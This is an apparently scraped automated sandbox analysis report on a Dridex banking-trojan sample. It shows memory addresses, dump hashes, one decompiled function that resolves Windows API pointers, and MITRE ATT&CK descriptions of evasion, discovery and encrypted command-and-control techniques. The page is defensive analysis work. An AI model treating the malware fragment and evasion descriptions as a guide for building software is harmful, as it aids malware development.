0x6eb618ac
0x6eb618b5
0x6eb618b9
0x6eb618c6
0x6eb618cf
0x6eb618d4
0x6eb618d8
0x6eb618db
0x6eb6193c
0x6eb61952
0x6eb6195d
0x6eb6195e
0x6eb6195f
0x6eb61963
0x6eb61966
0x6eb61be6
0x6eb61be9
0x6eb61be9
0x00000000
0x6eb61966
0x6eb618e5
0x6eb618f5
0x6eb618fe
0x6eb61907
0x6eb61910
0x6eb61911
0x6eb61912
0x6eb61917
0x6eb6191f
0x6eb61927
0x00000000
0x00000000
0x00000000
0x6eb61929
0x6eb61859
0x6eb6185e
0x6eb61862
0x6eb61862
0x6eb61866
0x6eb61869
0x00000000
0x00000000
0x6eb6188a
0x6eb6188c
0x6eb61890
0x6eb61892
0x00000000
0x00000000
0x6eb61894
0x6eb6189b
0x6eb618a7
0x00000000
0x6eb618a7
0x6eb6186e
0x00000000
0x6eb6196c
0x6eb6196c
0x6eb6196d
0x6eb6197d
0x6eb61989
0x6eb61992
0x6eb6199b
0x6eb619a4
0x00000000
0x6eb619a4
0x6eb61653
0x6eb61655
0x6eb61657
0x6eb6165c
0x6eb61661
0x6eb61674
0x6eb6168a
0x6eb61693
0x6eb61694
0x6eb61694
0x6eb61696
0x6eb61697
0x6eb6169a
0x6eb6169e
0x00000000
0x6eb61657
0x6eb615f3
0x6eb615fd
0x6eb615fe
0x6eb615fe
0x6eb6160b
0x6eb61617
0x6eb61619
0x6eb6161b
0x6eb6161f
0x6eb6162f
0x6eb6162f
0x6eb61636
0x6eb61639
0x6eb6163a
0x6eb6163e
0x6eb61648
0x00000000
0x6eb61648

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c489ea4f0b0bd93c9d35d251b23d6fd47ab43f08665361168cb026b0f12552e4
Instruction ID: 3f5efd106c0b42c4ac6f1b152922cb875478820fdc7657487ef9d6d4a22c2120
Opcode Fuzzy Hash: c489ea4f0b0bd93c9d35d251b23d6fd47ab43f08665361168cb026b0f12552e4
Instruction Fuzzy Hash: A5329D705183818FD750DFA4C890AEEBBE4FF94304F188D2DE5998B2A1EB70D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EB56D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB56D0C() {

				 *0x6eb6d280 = GetUserNameW;
				 *0x6EB6D284 = MessageBoxW;
				 *0x6EB6D288 = GetLastError;
				 *0x6EB6D28C = CreateFileA;
				 *0x6EB6D290 = DebugBreak;
				 *0x6EB6D294 = FlushFileBuffers;
				 *0x6EB6D298 = FreeEnvironmentStringsA;
				 *0x6EB6D29C = GetConsoleOutputCP;
				 *0x6EB6D2A0 = GetEnvironmentStrings;
				 *0x6EB6D2A4 = GetLocaleInfoA;
				 *0x6EB6D2A8 = GetStartupInfoA;
				 *0x6EB6D2AC = GetStringTypeA;
				 *0x6EB6D2B0 = HeapValidate;
				 *0x6EB6D2B4 = IsBadReadPtr;
				 *0x6EB6D2B8 = LCMapStringA;
				 *0x6EB6D2BC = LoadLibraryA;
				 *0x6EB6D2C0 = OutputDebugStringA;
				return 0x6eb6d280;
			}

0x6eb56d1d
0x6eb56d25
0x6eb56d28
0x6eb56d37
0x6eb56d3a
0x6eb56d49
0x6eb56d4c
0x6eb56d5b
0x6eb56d5e
0x6eb56d6d
0x6eb56d70
0x6eb56d7f
0x6eb56d82
0x6eb56d91
0x6eb56d94
0x6eb56da3
0x6eb56da6
0x6eb56da9

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62662a334da887c281439724408920cc940d077056022a8a91517fac9e568a5e
Instruction ID: 06f090eab1747a6f424add8bc2d531437d0f341c39d182eca1a8376675d11427
Opcode Fuzzy Hash: 62662a334da887c281439724408920cc940d077056022a8a91517fac9e568a5e
Instruction Fuzzy Hash: 5D11F6B4A15A22CFCF88CF45D1908617BF1FBAD31031181AAD8098B3A5D734E845CF54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.11362.23809

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6EB60730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6EB62234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6EB62820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6EB63138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 02802092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6EB610A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6EB657B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6EB65B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 028026AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6EB61166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6EB65BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EB65BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EB65BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6EB65BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6EB65C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6EB65E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6EB65E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6EB6564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6EB61030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6EB63628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6EB51494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6EB5A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6EB58428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6EB69370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6EB6143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6EB56D0C, Relevance: .0, Instructions: 36
COMMON